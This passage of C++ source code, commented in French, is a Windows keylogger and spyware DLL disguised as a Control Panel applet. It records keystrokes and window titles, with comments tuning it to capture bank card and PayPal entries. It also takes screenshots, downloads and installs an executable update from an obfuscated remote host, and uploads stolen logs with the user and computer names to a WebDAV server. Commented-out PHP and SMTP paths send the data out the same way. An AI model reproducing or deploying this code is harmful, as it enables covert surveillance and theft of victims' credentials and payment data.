391if(i==48)Ch+='à'; else if(i==49)Ch+='&'; else if(i==50)Ch+='é'; else if(i==51)Ch+='"'; else if(i==52)Ch+='\''; else if(i==53)Ch+='('; else if(i==54)Ch+='-'; else if(i==55)Ch+='è'; else if(i==56)Ch+='_'; else if(i==57)Ch+='ç';//azerty
392}else{
393//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='('; n=0;} if(!Ch)Ch+=i; n+=1;
394//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;}else{Ch+=i; n+=1;} if(!Ch){Ch+=i; n+=1;}
395//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;}else{n+=1;} if(!Ch){Ch+=i;}
396//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;}else{if(Ch&*keytext==i){n+=1;}} if(!Ch){Ch+=i; n+=1;}
397//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;} if(Ch&*keytext==i){n+=1;} if(!Ch){Ch+=i; n+=1;}
398//////if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;} if(Ch&*keytext==i){n+=1;} if(!Ch){Ch+=i; n+=1;}
399//MessageBox(0, "2", "Title", 0);
400n+=1;
401Ch+=i;
402}
403}
404
405//for(int i='A'; i<='Z'; i++)
406for(int i=65; i<91; i++)
407if(Ge_yncKe_tate(i)){
408while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
409n=0;
410if(shift){//shift pas appuyer
411i+=0x20;//32;//tolower 65+32=97=a
412}
413Ch+=i;//toupper
414}
415
416/*if (strlen(keytext) != 1) // big name
417sprintf(buffer, "[%s]", keytext);
418else if (shift)
419sprintf(buffer, "%c", toupper(keytext[0]));
420else
421sprintf(buffer, "%c", tolower(keytext[0]));//*/
422
423if(Ge_Ke_tate(144)){//NumLock activer
424for(int i=96; i<106; i++)//NUMPAD
425if(Ge_yncKe_tate(i)){
426while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
427file=fopen("0","a+");
428fprintf(file,"<font color=B545F5 font size=1>{NUM%c}</font>",i-=48);
429fclose(file);
430n+=1;
431//Ch+=i-=48;
432}
433}
434
435/*
436for(int i=107; i<=255; i++)
437if(Ge_yncKe_tate(i)){
438while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
439if(!Ge_Ke_tate(20)){//Caps Lock VK_CAPITAL en HEX 0x14 (Caps Lock pas activer)
440n=0;
441
442vkey = MapVirtualKey(i, 0);
443
444 switch(vkey){
445 //case 28: // enter
446 //strcpy((char*)Ch, "\n");
447 //break;
448 //case 57: // space
449 //strcpy((char*)Ch, " ");
450 //break;
451 //case 91: // winkey
452 //strcpy((char*)Ch, "Win");
453 //break;
454 default:
455 GetKeyNameText(vkey << 16, keytext, 48);
456 }
457
458 //if (strlen(keytext) != 1) // big name
459 sprintf(buffer, "%s", keytext);
460 //else
461 //if (shift)
462 //sprintf(buffer, "%c", toupper(keytext[0]));
463 //else
464 //sprintf(buffer, "%c", tolower(keytext[0]));
465
466file=fopen("0","a+");
467fputs(buffer,file);
468fclose(file);
469}else{
470
471}
472}//*/
473
474if(Ge_yncKe_tate(1)){//VK_LBUTTON (Left mouse button)
475while(!(Ge_yncKe_tate(1) & 0x8000) ? 0 : 1);
476//n=0;//tmp
477//*VK_LBUTTON=1 VK_RBUTTON=2 VK_MBUTTON=4 delete lpszWindowText;
478HWND hWnd = HandleFromMouse();
479LPSTR lpszWindowText = new CHAR[256];
480GetWindowText(hWnd, lpszWindowText, 256);
481
482if(strcmp(lpszWindowText,dow0) & strcmp(lpszWindowText,"")){// & strcmp(lpszWindowText0,"FolderView") & strcmp(lpszWindowText0,"Chrome Legacy Window")){
483//if(strcmp(lpszWindowText,"")){
484
485file=fopen("0", "a+");
486fprintf(file, "<font color=B4045F font size=1>{%s}</font>", lpszWindowText);//<font color=B4045F style=font-size:12px>{%s}</font>
487fclose(file);
488}else{
489Ch+=' ';
490}
491}//*/
492
493if(Ge_yncKe_tate(8)){//VK_BACK
494while(!(Ge_yncKe_tate(8) & 0x8000) ? 0 : 1);
495n-=1;//tmp
496//file=fopen("0","a+");
497//fputs("<font color=F8284B font size=1>{BACK}</font>",file);
498//fclose(file);
499Ch+='{';
500}
501
502/*
503if(Ge_yncKe_tate(VK_OEM_2)){
504while(!(Ge_yncKe_tate(VK_OEM_2) & 0x8000) ? 0 : 1);
505n=1;
506}//*/
507
508if(Ge_yncKe_tate(9)){//VK_TAB (TAB key)
509Ch+=' ';
510}
511
512if(Ge_yncKe_tate(13)){//ENTER
513n=0;//tmp
514file=fopen("0","a+");
515fputs("<p>",file);
516fclose(file);
517}
518
519if(Ge_yncKe_tate(17)){//tmp Alt
520while(!(Ge_yncKe_tate(17) & 0x8000) ? 0 : 1);
521n=0;
522file=fopen("0","a+");
523fputs("<font color=06503A font size=1>{ALT}</font>",file);//06503A 0A936A 0CAB7C
524fclose(file);
525}
526
527if(Ge_yncKe_tate(20)){//tmp Caps Lock VK_CAPITAL en HEX 0x14
528while(!(Ge_yncKe_tate(20) & 0x8000) ? 0 : 1);
529n=0;
530file=fopen("0","a+");
531fputs("<font color=F59A45 font size=1>{CAPSLOCK}</font>",file);
532fclose(file);
533}
534
535if(Ge_yncKe_tate(32)){//VK_SPACE (SPACEBAR) Decimal pour tous caps lock (20) spacebar (32) ect...
536n=0;//tmp
537Ch+=' ';
538}
539
540//VK_LSHIFT gauche, VK_RSHIFT droite VK_LCONTROL VK_RCONTROL VK_LMENU VK_RMENU
541
542/*
543for(int i=186; i<192; i++)//(voir 193 `ù)
544if(Ge_yncKe_tate(i)){
545while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
546GetKeyNameText(MapVirtualKey(i, 0) << 16, keytext, 256);
547char n3[256];
548itoa(i,n3,10);
549MessageBox(0, keytext, n3, 0);
550//if(shift^!Ge_Ke_tate(20)){//a voir
551if(shift){
552
553if(Ge_yncKe_tate(16)){ if(*keytext=='0')Ch+=')'-*keytext; else if(*keytext=='1')Ch+='!'-*keytext; else if(*keytext=='2')Ch+='@'-*keytext; else if(*keytext=='3')Ch+='#'-*keytext; else if(*keytext=='4')Ch+='$'-*keytext; else if(*keytext=='5')Ch+='%'-*keytext; else if(*keytext=='6')Ch+='^'-*keytext; else if(*keytext=='7')Ch+='&'-*keytext; else if(*keytext=='8')Ch+='*'-*keytext; else if(*keytext=='9')Ch+='('-*keytext;} Ch+=*keytext; n=0;
554
555}else{
556
557if(Ge_yncKe_tate(16)){ if(*keytext=='0')Ch+=')'-i; else if(*keytext=='1')Ch+='!'-i; else if(*keytext=='2')Ch+='@'-i; else if(*keytext=='3')Ch+='#'-i; else if(*keytext=='4')Ch+='$'-i; else if(*keytext=='5')Ch+='%'-i; else if(*keytext=='6')Ch+='^'-i; else if(*keytext=='7')Ch+='&'-i; else if(*keytext=='8')Ch+='*'-i; else if(*keytext=='9')Ch+='('-i; n=0;} Ch+=i; n+=1;
558
559}
560}//*/
561
562if(Ge_yncKe_tate(187)){
563while(!(Ge_yncKe_tate(187) & 0x8000) ? 0 : 1);
564n=0;
565//if(shift^Ge_Ke_tate(20)){
566if(shift){
567Ch+='=';
568}else{
569Ch+='+';
570}
571}
572
573if(Ge_yncKe_tate(188)){
574while(!(Ge_yncKe_tate(188) & 0x8000) ? 0 : 1);
575n=0;
576Ch+=',';
577}
578
579if(Ge_yncKe_tate(189)){
580while(!(Ge_yncKe_tate(189) & 0x8000) ? 0 : 1);
581n=0;
582if(shift^Ge_Ke_tate(20)){
583Ch+='-';
584}else{
585Ch+='_';
586}
587}
588
589if(Ge_yncKe_tate(190)){
590while(!(Ge_yncKe_tate(190) & 0x8000) ? 0 : 1);
591n=0;
592Ch+='.';
593}
594
595//if(Ge_yncKe_tate(17) && Ge_yncKe_tate(65)){
596//MessageBox(0, "unhide keylogger", "Title", 0);
597//}
598
599/*
600if(Ge_yncKe_tate(17)&&(64)){//17=Alt Gr 48=0 64=@
601while(!(Ge_yncKe_tate(17)&&(64) & 0x8000) ? 0 : 1);
602n=0;
603Ch+='@';
604}
605//17 Alt Gr key - VK_AT 64 @//*/
606
607/*
608if(Ge_yncKe_tate(17)){//17=Alt Gr 48=0 64=@
609if(Ge_yncKe_tate(48));
610while(!(Ge_yncKe_tate(48) & 0x8000) ? 0 : 1);
611n=0;
612Ch+='@';
613}
614//17 Alt Gr key - VK_AT 64 @//*/
615
616/*
617if(Ge_yncKe_tate(191)){//(pour test)
618while(!(Ge_yncKe_tate(191) & 0x8000) ? 0 : 1);
619n=0;
620//if(!Ge_Ke_tate(20)){
621//Ch+=':';
622//}else{
623Ch+='?';
624//}
625}//*/
626
627if(Ge_yncKe_tate(191)){
628while(!(Ge_yncKe_tate(191) & 0x8000) ? 0 : 1);
629n=14;//(Mettre 14 pour Paypal "Link a card", et les autres site qui utilise une date d'expiration avec "/" comme Ex:09/18) (A voir, Fait).
630Ch+='/';
631}
632
633/*
634if(Ge_yncKe_tate(192)){
635while(!(Ge_yncKe_tate(192) & 0x8000) ? 0 : 1);
636n=0;
637//if(!Ge_Ke_tate(20)){
638if(!Ge_yncKe_tate(16)^Ge_Ke_tate(20)^Ge_Ke_tate(20)){
639Ch+='`';
640}else{
641Ch+='~';
642}
643}//*/
644
645/*
646if(Ge_yncKe_tate(219)){
647while(!(Ge_yncKe_tate(219) & 0x8000) ? 0 : 1);
648n=0;
649//if(!Ge_Ke_tate(20)){
650if(!Ge_yncKe_tate(16)^Ge_Ke_tate(20)^Ge_Ke_tate(20)){
651Ch+='[';
652}else{
653Ch+='{';
654}
655}//*/
656
657/*
658if(Ge_yncKe_tate(220)){
659while(!(Ge_yncKe_tate(220) & 0x8000) ? 0 : 1);
660n=0;
661//if(!Ge_Ke_tate(20)){
662//Ch+='*';
663//}else{
664Ch+='|';
665//}
666}//*/
667
668/*
669if(Ge_yncKe_tate(221)){
670n=0;
671if(!Ge_Ke_tate(20)){
672Ch+='^';
673}else{
674Ch+='¨';
675}
676}//*/
677
678/*
679if(Ge_yncKe_tate(221)){
680while(!(Ge_yncKe_tate(221) & 0x8000) ? 0 : 1);
681n=0;
682//if(!Ge_Ke_tate(20)){
683//Ch+='!';
684//}else{
685Ch+='}';
686//}
687}//*/
688
689/*peut etre
690if(Ge_yncKe_tate(222)){
691while(!(Ge_yncKe_tate(222) & 0x8000) ? 0 : 1);
692n=0;
693//if(!Ge_Ke_tate(20)){
694if(!Ge_yncKe_tate(16)^Ge_Ke_tate(20)^Ge_Ke_tate(20)){
695Ch+='\'';
696}else{
697Ch+='"';
698}
699}//*/
700
701/*
702if(Ge_yncKe_tate(223)){
703while(!(Ge_yncKe_tate(223) & 0x8000) ? 0 : 1);
704n=0;
705if(!Ge_Ke_tate(20)){
706Ch+='!';
707}else{
708Ch+='§';
709}
710}//*/
711
712/*
713for(int i=8; i<223; i++)
714if(Ge_yncKe_tate(i)){
715while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
716char n2[256];
717itoa(i,n2,10);
718MessageBox(0, n2, "Title", 0);
719}//*/
720
721/*
722for(int i=39; i<65; i++)
723if(Ge_yncKe_tate(i)){
724while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
725char n3[256];
726itoa(i,n3,10);
727MessageBox(0, n3, "Title", 0);
728}//*/
729
730/*
731for(int i=0; i<32768; i++)
732if(Ge_yncKe_tate(i)){
733while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
734char n4[256];
735itoa(i,n4,10);
736MessageBox(0, n4, "Title", 0);
737//n=0;
738//if(!Ge_Ke_tate(20)){
739//i+=32;
740//}
741//Ch+=i;
742}//*/
743
744}
745}
746
747DWORD WINAPI Thread_Down_Screen_Up(LPVOID lpParameter){//*Downloader https://msdn.microsoft.com/fr-fr/library/windows/desktop/aa384023(v=vs.85).aspx
748Sleep(360000);//360000
749
750GetWindowText(FindWindow("SystemTray_Main",NULL),dow1,256);
751
752HRESULT hr = CoInitialize(NULL);
753
754CLSID rclsid;
755CLSIDFromProgID(L"MSXML2.ServerXMLHTTP",&rclsid);//OLESTR("MSXML2.ServerXMLHTTP"), a voir: (bon)MSXML2.ServerXMLHTTP (pas bon)Microsoft.XMLHTTP et (a tester peut etre plus court)Msxml2.XMLHTTP
756
757IXMLHttpRequest *pipfile;
758hr = CoCreateInstance(rclsid, NULL, 0x1, IID_IXMLHttpRequest, (LPVOID*)&pipfile);
759
760VARIANT vAsync, vUserID, vPassword, vSend, vFlux;
761//*
762VariantInit(&vAsync);
763vAsync.vt = VT_BOOL;
764vAsync.boolVal = VARIANT_FALSE;
765
766//*
767wchar_t wmail[256];// (PassWord debut)
768mbstowcs(wmail, decrypt((char*)"•Œ›ˆ™g•Œ›ŠU™"), 15);//Taille 14+1=15
769VariantInit(&vUserID);
770vUserID.vt = VT_BSTR;
771vUserID.bstrVal = SysAllocString(wmail);//L"netafr@netc.fr"
772
773wmail[6]=0;//"netafr" moins "@netc.fr" = 6
774//////wchar_t wmail0[256];
775//////mbstowcs(wmail0, decrypt((char*)"•Œ›ˆ™"), 7);
776VariantInit(&vPassword);
777vPassword.vt = VT_BSTR;
778vPassword.bstrVal = SysAllocString(wmail);//L"netafr" (PassWord fin)//*/
779
780VariantInit(&vSend);
781vSend.vt = VT_BSTR;
782vSend.bstrVal = NULL;
783
784VariantInit(&vFlux);//La
785
786char form_[256];
787sprintf(form_,"%s/a",decrypt((char*)"››—aVV‹š’U•Œ›Š–œ™™Œ™UŠ–”"));//http://disk.netcourrier.com = ››—aVV‹š’U•Œ›Š–œ™™Œ™UŠ–”
788//sprintf(form_,"%s/a",decrypt((char*)""));//sfraaBB_1 http://oraccBB_1%40netc.fr:oraccBB_1@disk.netcourrier.com =
789pipfile->open((BSTR)L"GET", conv(form_), vAsync, vUserID, vPassword);
790//pipfile->open((BSTR)L"GET", (BSTR)L"http://disk.netcourrier.com/a", vAsync, vUserID, vPassword);
791pipfile->send(vSend);
792hr = pipfile->get_responseStream(&vFlux);
793if(SUCCEEDED(hr)){
794
795 IStream* pStream = NULL;
796 BYTE bBuffer[2];
797 char buffer2[] = "MZ";
798 DWORD cbRead, cbWritten;
799
800V_UNKNOWN(&vFlux)->QueryInterface(IID_IStream, reinterpret_cast<void**>(&pStream));
801
802pStream->Read(bBuffer, sizeof bBuffer, &cbRead);
803if(!memcmp(bBuffer, buffer2, sizeof bBuffer)){
804//if(MoveFileEx(path, "a.cpl", 1)){
805MoveFileEx(path,".lnk",1);
806
807HANDLE hFile = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 4, NULL);//FILE_ATTRIBUTE_NORMAL
808while (0 != cbRead){
809WriteFile(hFile, bBuffer, cbRead, &cbWritten, NULL);
810pStream->Read(bBuffer, sizeof bBuffer, &cbRead);
811}
812CloseHandle(hFile);
813 //}
814 }else
815 //MessageBox(0, "", "Downloader 0", 0);//Si a existe pas.
816 Down0();
817
818 }else
819 //MessageBox(0, "", "Downloader 1", 0);//Si serveur existe pas.
820 Down0();//Downloader*/
821
822//HANDLE hInput = CreateFile("0",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);//a la taille du fichier "0".
823//DWORD dwFileSiz = GetFileSize(hInput,NULL);
824//CloseHandle(hInput);
825
826while(1){
827//MessageBox(0, "", "Downloader", 0);
828Sleep(100);
829
830//MessageBox(0, (LPCSTR)dwFileSiz, "Title", 0);
831//if((n>18) & (dwFileSiz>200000)){//200000=2Mo n>18
832
833if(n>7){//7 Compte, 18 CB
834//MessageBox(0, "if(n>18){//7 Compte, 18 CB", "Title", 0);
835while(b<100){//100 - 87 - 2
836GetCursorPos(&cu);
837int x = (int) cu.x;
838int y = (int) cu.y;
839GetCursorPos(&cu2);
840int x2 = (int) cu2.x;
841int y2 = (int) cu2.y;
842if((x != x2) || (y != y2)){
843
844 ULONG_PTR gdiplusToken;
845 GdiplusStartupInput gdiplusStartupInput;
846 GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);
847
848 HDC hdcScreen = CreateDC("DISPLAY", NULL, NULL, NULL);
849 HDC hdcCapture = CreateCompatibleDC(hdcScreen);
850 int nWidth = GetDeviceCaps(hdcScreen, HORZRES), nHeight = GetDeviceCaps(hdcScreen, VERTRES), nBPP = GetDeviceCaps(hdcScreen, BITSPIXEL);
851
852 LPBYTE lpCapture;
853 BITMAPINFO bmiCapture = {sizeof(BITMAPINFOHEADER), nWidth, -nHeight, 1, nBPP, BI_RGB, 0, 0, 0, 0, 0};
854 HBITMAP hbmCapture = CreateDIBSection(hdcScreen, &bmiCapture, DIB_PAL_COLORS, (LPVOID *)&lpCapture, NULL, 0);
855
856 int nCapture = SaveDC(hdcCapture);
857 SelectObject(hdcCapture, hbmCapture);
858 BitBlt(hdcCapture, 0, 0, nWidth, nHeight, hdcScreen, 0, 0, SRCCOPY);
859
860int x, y;// <-- Cursor
861CURSORINFO cursorInfo;
862ICONINFO iconInfo;
863
864cursorInfo.cbSize = sizeof(CURSORINFO);
865GetCursorInfo(&cursorInfo);
866
867GetIconInfo(cursorInfo.hCursor, &iconInfo);
868
869x = cursorInfo.ptScreenPos.x - iconInfo.xHotspot;
870y = cursorInfo.ptScreenPos.y - iconInfo.yHotspot;
871DrawIcon(hdcCapture, x, y, cursorInfo.hCursor);// --> Cursor
872
873 RestoreDC(hdcCapture, nCapture);
874 DeleteDC(hdcCapture);
875 DeleteDC(hdcScreen);
876
877CLSID imageCLSID;
878CLSIDFromString(L"{557cf401-1a04-11d3-9a73-0000f81ef32e}", &imageCLSID);//L"{557cf401-1a04-11d3-9a73-0000f81ef32e}"//(LPCOLESTR)decrypt((char*)"¢\\^Š[WXTXˆW[TXX‹ZT`ˆ^ZTWWWW_XŒZYŒ¤")
879
880 Bitmap *pScreenShot = new Bitmap(hbmCapture, (HPALETTE)NULL);
881 EncoderParameters encoderParams;
882 ULONG quality = 10;
883 encoderParams.Count = 1;
884 encoderParams.Parameter[0].NumberOfValues = 1;
885 encoderParams.Parameter[0].Guid = EncoderQuality;
886 encoderParams.Parameter[0].Type = EncoderParameterValueTypeLong;
887 encoderParams.Parameter[0].Value = &quality;
888
889LPWSTR y_ = (LPWSTR)malloc(30);
890_itow(b, y_, 10);
891
892//GetEncoderClsid(L"image/jpeg", &imageCLSID);
893
894 pScreenShot->Save(y_, &imageCLSID, &encoderParams);
895
896 delete pScreenShot;
897 DeleteObject(hbmCapture);
898b+=1;
899}
900}
901
902b=0;
903
904GetUserName(UN,(DWORD*)&nUserName);
905GetComputerName(CN,(DWORD*)&nComputerName);
906GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_SENGCOUNTRY, Cy, 256);//LOCALE_SYSTEM_DEFAULT = 0x0800
907Sleep(150000);//150000
908GetLocalTime(&st);
909DWORD dwVersion = GetVersion();//5 = 2000 XP <-> Server 2003 R2, 6 = Vista <-> 8.1, 10 = Server 2016 <-> 10
910
911/*PHP index.php //mkdir($_GET['3']);
912<?php
913
914$filec=pack('H*',$_POST['w']);
915mkdir($_POST['3']);
916
917$file=fopen($_POST['3']."/".$_POST['2'].".jpg","a+");
918fputs($file,$filec);
919fclose($file);
920
921rename($_POST['3']."/0.jpg",$_POST['3']."/0.htm");
922
923//unlink('Sirewa__.cpl');
924?>//PHP*/
925
926/*PHP
927VariantInit(&vUserID);
928vUserID.vt = VT_BSTR;
929vUserID.bstrVal = NULL;
930
931VariantInit(&vPassword);
932vPassword.vt = VT_BSTR;
933vPassword.bstrVal = NULL;
934
935while(b<87){
936itoa(b,n1,10);
937
938HANDLE hFile = CreateFile(n1, FILE_READ_ATTRIBUTES, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
939DWORD taille = GetFileSize(hFile, NULL);
940CloseHandle(hFile);
941
942char load_string[taille];
943
944file=fopen(n1,"rb");
945fread(load_string,taille,1,file);
946fclose(file);
947DeleteFile("0");//Pas besoin de supprimer les images .jpg, elles sont écrasées.
948
949char *load_string1 = (char*)malloc( taille*3 );
950
951for (int i = 0; i < taille; i++){
952sprintf(load_string1+2*i,"%02x",(unsigned char)load_string[i]);
953}
954
955VariantInit(&vSend);
956vSend.vt = VT_BSTR;
957
958char *form = (char*)malloc( ( lstrlen(load_string1) *4 ) + lstrlen(n1) );
959ZeroMemory( form , sizeof( form ) );
960sprintf(form,"3=%s %d-%d %dh%d&2=%s&w=%s",UN,st.wDay,st.wMonth,st.wHour,st.wMinute,n1,load_string1);
961
962//BSTR conv(char *div){
963vSend.bstrVal = SysAllocString(conv(form));/bstr
964
965pipfile->open((BSTR)L"POST", (BSTR)L"http://192.168.43.1/index.php", vAsync, vUserID, vPassword);//"http://gamani0001.url.ph/index.php"
966pipfile->setRequestHeader((BSTR)L"Content-Type", (BSTR)L"application/x-www-form-urlencoded");
967pipfile->send(vSend);
968//SysFreeString(bstr);
969//free(form);
970b+=1;
971}
972
973b=1;//PHP*/
974
975//*WebDav
976//Enlever: VariantInit(&vUserID); et VariantInit(&vPassword);
977VariantInit(&vSend);
978vSend.vt = VT_BSTR;
979
980char *HTML = (char*)malloc(6000000);//6000000 sizeof(*HTML) lstrlen(HTML) *2
981
982//char *HTML = (char*)malloc(sizeof(char));//6000000 sizeof(HTML)
983
984while(b<100){//87
985
986itoa(b,n1,10);
987
988HANDLE hInput = CreateFile(n1,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
989DWORD dwFileSiz = GetFileSize(hInput,NULL);
990BYTE *pBuffer = new BYTE[dwFileSiz];
991DWORD dwBytesRead;
992ReadFile(hInput,pBuffer,dwFileSiz,&dwBytesRead,NULL);
993CloseHandle(hInput);
994DeleteFile("0");//DeleteFile(n1); Pas besoin de supprimer les images .jpg, elles sont écrasées.
995LPTSTR szBase64 = BinToBase64(pBuffer,dwFileSiz);
996delete [] pBuffer;
997
998if(strcmp(n1,"0")){
999strcat(HTML,n1);
1000strcat(HTML,"<img src=\"data:image/jpeg;base64,");
1001strcat(HTML,szBase64);
1002strcat(HTML,"\">");
1003}else{
1004strcat(HTML,"<iframe src=\"data:text/html;base64,");//Ajouter le code suivant entre les balises <head> et </head>: <head> <meta charset="UTF-8"> </head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> azerty azeérty^ç&hohoho </head>
1005//strcat(HTML,(LPTSTR*)pBuffer);//(char*)pBuffer
1006strcat(HTML,szBase64);
1007strcat(HTML,"\"width=\"100%\" height=\"100%\"></iframe>");
1008}
1009
1010b+=1;
1011}
1012
1013//enc(HTML);
1014//MessageBox(0, HTML, buf0, 0);
1015
1016/* <-- Mail
1017file=fopen("0","a+");
1018fputs(HTML,file);
1019fclose(file);
1020
1021HANDLE hInput = CreateFile("0",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
1022DWORD dwFileSiz = GetFileSize(hInput,NULL);
1023BYTE *pBuffer = new BYTE[dwFileSiz];
1024DWORD dwBytesRead;
1025ReadFile(hInput,pBuffer,dwFileSiz,&dwBytesRead,NULL);
1026CloseHandle(hInput);
1027DeleteFile("0");//pas besoin je crois. SI DeleteFile(n1);
1028LPTSTR szBase64 = BinToBase64(pBuffer,dwFileSiz);
1029delete [] pBuffer;
1030
1031sprintf(n1,"%s %d-%d %dh%d",UN,st.wDay,st.wMonth,st.wHour,st.wMinute);
1032//MailIt( (char*)"gmail-smtp-in.l.google.com", (char*)"mrmrmr0000001@gmail.com", (char*)"rapport@mail.com", n1, szBase64);
1033MailIt( (char*)"smtp-in.orange.fr", (char*)"0608318985@orange.fr", (char*)"rapport@mail.com", n1, szBase64);//(.com) relais-aub03.orange.com relais-nor19.orange.com
1034//MailIt( (char*)"mx-domain.netcourrier.com", (char*)"stock0@netc.fr", (char*)"rapport@mail.com", n1, szBase64);
1035MessageBox(0, "Mail envoyé", "MessageBox", 0);//path_EXE_entier --> Mail//*/
1036
1037vSend.bstrVal = SysAllocString(conv(HTML));
1038
1039char form[256];
1040sprintf(form,"%s%s %s %d %s %d-%d-%d %dh%d-%dsecon.htm",decrypt((char*)"››—aVV‹š’U•Œ›Š–œ™™Œ™UŠ–”V"),UN,CN,(DWORD)(LOBYTE(LOWORD(dwVersion))),Cy,st.wDay,st.wMonth,st.wYear,st.wHour,st.wMinute,st.wSecond);
1041//sprintf(form,"http://192.168.43.1:8080/%s %d-%d %dh%d.htm",UN,st.wDay,st.wMonth,st.wHour,st.wMinute);
1042//sprintf(form,"http://stock00.pagekite.me:8080/%s %d-%d %dh%d.htm",UN,st.wDay,st.wMonth,st.wHour,st.wMinute);
1043//sprintf(form,decrypt((char*)"ƒƒ_XUY[_UZUXWƒk–Šœ”Œ•›šƒliwƒwˆ™›ˆŽŒƒw–•›G‹ŒG}Œ•›ŒGOiˆŠ’GvŠŒPƒp”—lŸ—ƒLšGLšGL‹GLšGL‹TL‹TL‹GL‹L‹TL‹šU›”"),UN,CN,(DWORD)(LOBYTE(LOWORD(dwVersion))),Cy,st.wDay,st.wMonth,st.wYear,st.wHour,st.wMinute,st.wSecond);//(Enlever "st.wYear" année et "st.wSecond" second)//"\\\\81.248.3.10\\Documents\\EBP\\Partage\\Point de Vente (Back Office)\\ImpExp\\%s %s %d %s %d-%d-%d %dh%d-%ds.htm" \\81.248.3.10\partage serveur\.TemporaryItems\folders.502
1044//file = fopen("smb", "wb");
1045//fprintf(file, "%s", HTML);
1046//fclose(file);
1047//CopyFile("smb",form,1);
1048//MoveFileEx("smb",form,0);//2
1049pipfile->open((BSTR)L"PUT", conv(form), vAsync, vUserID, vPassword);//bstr0 <-- voir conversion. (BSTR)L"PUT", bstr0 <--> sprintf(form,"https://disk.netcourrier.com/%s %d-%d %dh%d.htm",UN,st.wDay,st.wMonth,st.wHour,st.wMinute);
1050pipfile->send(vSend);
1051
1052b=1;//WebDav*/
1053n=0;
1054Sleep(600000000);//Temporaire pour les doublons (a supprimer peut etre plus tard)
1055}
1056}
1057
1058}
1059
1060//int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){
1061//int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){
1062//main(){
1063//GetModuleFileName(0,path,256);
1064//MessageBox(0, path, "( exe ).", 0);
1065//}
1066
1067BOOL WINAPI DllMain(HINSTANCE hInstance,DWORD fdwReason,LPVOID lpvReserved){
1068if(fdwReason == DLL_PROCESS_ATTACH){
1069GetModuleFileName(hInstance,path,256);
1070//MessageBox(0, path, "( MessageBox - Title - BOOL WINAPI DllMain ).", 0);
1071}
1072
1073//if(fdwReason == DLL_PROCESS_DETACH){
1074//MessageBox(0, path, "( DLL_PROCESS_DETACH ).", 0);
1075//}
1076//return TRUE;
1077
1078}
1079
1080extern "C" LONG CALLBACK CPlApplet(HWND hwndCPL, UINT uMsg, LPARAM lParam1, LPARAM lParam2){//extern "C" WinExec("mshta vbscript:close(CreateObject(\"WScript.Shell\").Run(\"calc\"))");
1081/*
1082LPSHELLFLAGSTATE lpsfs = new SHELLFLAGSTATE();
1083SHGetSettings(lpsfs,SSF_SHOWEXTENSIONS);
1084if(lpsfs->fShowExtensions == FALSE )
1085{
1086
1087}
1088delete lpsfs;//*/
1089
1090/*
1091//ss.fShowAllObjects = 0;
1092
1093//SHELLFLAGSTATE u;//UInt16 u;
1094//SHGetSettings(&u, SSF_SHOWSUPERHIDDEN);
1095//bool bShowSup = ( ( u & 0x0002 ) != 0 );
